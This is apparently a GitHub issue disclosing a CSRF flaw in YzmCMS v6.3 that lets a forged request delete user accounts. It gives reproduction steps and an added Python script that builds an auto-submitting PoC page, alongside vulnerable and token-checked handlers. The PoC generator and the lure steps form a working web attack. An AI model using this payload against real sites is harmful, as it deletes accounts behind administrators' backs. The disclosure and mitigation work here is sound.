Headline
CVE-2022-23887: YzmCMS V6.3 CSRF vulnerability exists in the official version (the official release of YzmCMS V6.3 has a CSRF vulnerability) · Issue #59 · yzmcms/yzmcms
YzmCMS v6.3 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability that allows attackers to arbitrarily delete user accounts via /admin/admin_manage/delete.
This vulnerability allows arbitrary users to be deleted. Steps to reproduce:
There is a user with ID 3.
Click delete on that user and capture the request (for example in an intercepting proxy) to generate the CSRF PoC.
Drop the captured deletion request so that the user is not deleted yet, put the generated PoC in an HTML page and send it to the administrator. When the logged-in administrator opens the page, the user with ID 3 is deleted: the browser attaches the administrator's session cookie to the forged request, and the endpoint accepts the request on the strength of that cookie alone, with no token tying it to a page the administrator actually submitted.
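As an added example (not code from this issue or from YzmCMS), the following Python script builds the kind of PoC page the report describes and contrasts a deletion handler that behaves as reported with one that requires a per-session token and an Origin check. The issue gives only the path and the user ID; the HTTP method (POST), the parameter name (`id`), and the host names are assumptions.

```python
import hmac
import html
import secrets
from urllib.parse import urlencode

# Assumed values: the issue names the path and the user ID but not the HTTP
# method or the parameter name, so POST, "id" and the hosts are assumptions.
SITE = "http://yzmcms.example"            # placeholder host for the CMS
ATTACKER = "http://attacker.example"      # placeholder host serving the PoC
DELETE_PATH = "/admin/admin_manage/delete"
DELETE_PARAMS = {"id": "3"}               # user ID 3, as in the report


def csrf_poc_html(action, params, method="POST"):
    """Return a self-contained HTML page that replays the captured deletion
    request from the victim's browser. A POST becomes an auto-submitted hidden
    form; a GET becomes an <img> whose src carries the query string. Either
    way the browser attaches the admin's session cookie on its own, which is
    what makes the forged request succeed when no CSRF token is required."""
    if method.upper() == "GET":
        body = f'<img src="{html.escape(action)}?{html.escape(urlencode(params))}" alt="">'
    else:
        inputs = "\n".join(
            f'    <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
            for k, v in params.items()
        )
        body = (
            f'<form id="csrf" action="{html.escape(action)}" method="POST">\n'
            f"{inputs}\n"
            "  </form>\n"
            '  <script>document.getElementById("csrf").submit();</script>'
        )
    return f"<!DOCTYPE html>\n<html>\n<body>\n  {body}\n</body>\n</html>\n"


def vulnerable_delete(request, users):
    """Handler behaving as the issue describes: any request carrying a valid
    admin session deletes the user, regardless of which page sent it."""
    if not request["session"].get("is_admin"):
        return "forbidden"
    users.pop(request["params"]["id"], None)
    return "deleted"


def hardened_delete(request, users):
    """Same handler with a synchronizer token the attacker's page cannot read,
    plus an Origin check as defence in depth."""
    session = request["session"]
    if not session.get("is_admin"):
        return "forbidden"
    expected = session.get("csrf_token")
    sent = request["params"].get("csrf_token", "")
    # An absent session token must fail closed; "" == "" would otherwise pass.
    if not expected or not hmac.compare_digest(sent, expected):
        return "rejected: bad csrf token"
    if request["headers"].get("Origin", "") != SITE:
        return "rejected: cross-site origin"
    users.pop(request["params"]["id"], None)
    return "deleted"


def simulate(handler, legitimate=False):
    """Send one deletion request to the given handler and report the handler's
    verdict and whether user 3 survived. The user table and admin session are
    constructed sample data. By default the request is the one the PoC page
    forges; with legitimate=True it is what the CMS's own admin page sends."""
    users = {"1": "admin", "2": "editor", "3": "victim"}
    session = {"is_admin": True, "csrf_token": secrets.token_hex(16)}
    request = {
        "session": session,                 # cookie sent automatically
        "params": dict(DELETE_PARAMS),      # exactly what the PoC form posts
        "headers": {"Origin": ATTACKER},
    }
    if legitimate:
        request["params"]["csrf_token"] = session["csrf_token"]
        request["headers"]["Origin"] = SITE
    return handler(request, users), "3" in users


if __name__ == "__main__":
    print(csrf_poc_html(SITE + DELETE_PATH, DELETE_PARAMS))
    print("vulnerable, forged :", simulate(vulnerable_delete))
    print("hardened, forged   :", simulate(hardened_delete))
    print("hardened, legit    :", simulate(hardened_delete, legitimate=True))
```

The generated page is what would be sent to the administrator; the two handlers show why the forged request deletes user 3 against the reported behaviour and is rejected once the server demands a token the attacker's page cannot supply.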